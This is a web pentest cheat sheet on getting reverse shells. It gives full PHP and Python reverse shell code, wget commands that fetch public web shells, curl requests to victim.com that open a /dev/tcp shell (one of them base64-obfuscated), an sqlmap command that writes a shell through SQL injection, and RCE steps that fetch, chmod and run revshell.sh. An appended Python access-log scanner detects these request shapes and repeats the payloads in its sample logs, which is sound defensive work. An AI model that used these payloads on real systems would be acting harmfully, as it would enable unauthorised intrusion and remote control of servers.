Web Reverse Shell
We can get a shell by placing a reverse shell payload on the target website.
PHP Reverse Shell (Linux)
# From local script (it's stored by default in Kali or Parrot)
cp /usr/share/webshell/php/php-reverse-shell.php ./shell.php
# From repo (https://github.com/pentestmonkey/php-reverse-shell)
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
# From repo (https://github.com/flozz/p0wny-shell)
wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -O shell.php
Replace the $ip and the $port in the script with your local IP and port.
Without fsockopen, and for FreeBSD
<?php
set_time_limit (0);
$ip = '10.0.0.1'; // CHANGE THIS
$port = 4444; // CHANGE THIS
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("file", "/tmp/error-output.txt", "a") // stderr is a file that the child will append to
);
$cwd = "/tmp";
$env = array('some_option' => 'aeiou');
$process = proc_open('sh', $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f');
fclose($pipes[0]);
echo stream_get_contents($pipes[1]);
fclose($pipes[1]);
$return_value = proc_close($process);
echo "command returned $return_value\n";
}
?>
Using Web Shell
Create a PHP script that allows us to execute arbitrary commands.
Then upload it to the target website.
Now we might be able to execute arbitrary commands and, in short, get a reverse shell as below.
curl https://victim.com/uploads/shell.php?test='bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"'
# Base64 encoded payload
curl https://victim.com/uploads/shell.php?test='echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjEi | base64 -d | bash'
PHP Reverse Shell (Windows)
Below are the available payloads.
- https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php
- https://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/Reverse Shell.php
Python Reverse Shell (Linux)
For this to succeed, we need to be able to upload a payload and execute commands on the target website.
First, create a Python file e.g. "revshell.py". Replace the ip and the port with your own.
# revshell.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])
Then upload it to the target website.
Next, start a listener on the local machine.
Now we need to achieve command execution somehow on the target website.
If successful, we should get a shell.
ASP.NET
We can use a .aspx file for a reverse shell.
Download from here.
Upload Script via SQLi
# req.txt: The request settings file which is saved using Burp Suite
sqlmap -r req.txt --dbs --random-agent --batch --file-dest=/var/www/html/shell.php --file-write=./shell.php
Useful Tools
-
A web shell generator.
-
Generate Backdoor with Password
Credentials required.
-
Upload the Payload to Target Website and Execute Commands
-
Get a Shell
-
Shell Script & Remote Code Execution (RCE)
If a website is vulnerable to Remote Code Execution but we cannot get a reverse shell directly, we may be able to get one by uploading a script.
1. Create a shell script for the reverse shell.
This file is named "revshell.sh".
2. Upload the script to the website
Start a web server on the local machine to serve the script.
Then upload it via remote code execution on the target website.
https://vulnerable.com/?cmd=wget http://<local-ip>:8000/revshell.sh
# or
https://vulnerable.com/?cmd=curl <local-ip>:8000/revshell.sh
To confirm the script was uploaded, execute the following RCE.
3. Get a shell
Start a listener on the local machine to receive the shell.
Now execute the uploaded script via RCE.
# 1. Change permission for the script
https://vulnerable.com/?cmd=chmod 777 revshell.sh
# 2. Execute the script
https://vulnerable.com/?cmd=./revshell.sh
We should now get the target shell.
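The requests in the web shell and RCE sections above leave a recognizable trail in the web server's access log. The following is an added example, not part of the original page: a small log scanner that flags those request shapes. It assumes the combined log format and an `/uploads/` directory; the rule names, function names and log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Rules mirror the request shapes shown on this page; rule names are hypothetical.
RULES = [
    ("dev_tcp_redirect", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("base64_pipe_shell", re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")),
    ("remote_fetch", re.compile(r"\b(?:wget|curl)\s+(?:https?://)?[\w.-]+(?::\d+)?/\S+")),
    ("chmod", re.compile(r"\bchmod\s+(?:[0-7]{3,4}|\+x)\b")),
    ("run_shell_script", re.compile(r"(?:^|[\s;&|])\./\S+\.sh\b")),
]
# A script served from an upload directory (assumed path convention).
UPLOAD_SCRIPT = re.compile(r"/uploads?/[^/?]+\.(?:php\d?|phtml|aspx?|py|sh)$", re.I)
# Combined log format: client, identity, user, [time], "METHOD target PROTO", ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')

def scan_line(line):
    """Return (client, path, sorted rule names) for a suspicious line, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    hits = set()
    if UPLOAD_SCRIPT.search(url.path):
        hits.add("script_in_upload_dir")
    # parse_qsl percent-decodes each value, so URL-encoded commands still match.
    for _param, value in parse_qsl(url.query, keep_blank_values=True):
        hits.update(name for name, rx in RULES if rx.search(value))
    return (client, url.path, sorted(hits)) if hits else None

def scan(lines):
    """Scan an iterable of access-log lines and return all findings in order."""
    return [hit for hit in map(scan_line, lines) if hit]

# Constructed sample log lines (documentation addresses, placeholder base64).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /uploads/shell.php?test=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/10.0.0.1/4444%200%3E%261%22 HTTP/1.1" 200 0
203.0.113.7 - - [10/Oct/2024:13:56:02 +0000] "GET /uploads/shell.php?test=echo%20QUJD%20%7C%20base64%20-d%20%7C%20bash HTTP/1.1" 200 0
203.0.113.7 - - [10/Oct/2024:13:57:10 +0000] "GET /?cmd=wget%20http://198.51.100.9:8000/revshell.sh HTTP/1.1" 200 31
203.0.113.7 - - [10/Oct/2024:13:57:40 +0000] "GET /?cmd=chmod%20777%20revshell.sh HTTP/1.1" 200 0
203.0.113.7 - - [10/Oct/2024:13:57:55 +0000] "GET /?cmd=./revshell.sh HTTP/1.1" 200 0
198.51.100.20 - - [10/Oct/2024:14:01:00 +0000] "GET /search?q=curl+tutorial HTTP/1.1" 200 512
198.51.100.20 - - [10/Oct/2024:14:01:05 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 20480
""".splitlines()

if __name__ == "__main__":
    for client, path, rules in scan(SAMPLE_LOG):
        print(client, path, ",".join(rules))
```

Query-string matching only sees GET parameters; commands sent in POST bodies or headers do not appear in the access log and need request-body logging or a WAF rule instead.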